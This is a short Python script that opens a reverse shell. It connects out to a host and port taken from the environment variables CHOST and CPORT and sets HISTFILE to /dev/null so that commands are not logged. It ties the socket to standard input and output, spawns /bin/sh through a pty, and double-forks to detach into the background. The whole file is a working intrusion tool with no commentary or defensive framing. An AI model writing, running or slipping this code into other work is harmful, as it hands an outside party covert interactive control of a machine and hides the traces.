#!/usr/local/bin/python3.8
import socket
import pty
import os

def main():
    cb_host = os.getenv("CHOST")
    cb_port = os.getenv("CPORT")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((cb_host, int(cb_port)))
    os.putenv("HISTFILE", "/dev/null")
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/sh")

if __name__ == "__main__":
    if os.fork() > 0: os._exit( 0 )
    if os.fork() > 0: os._exit( 0 )
    main()
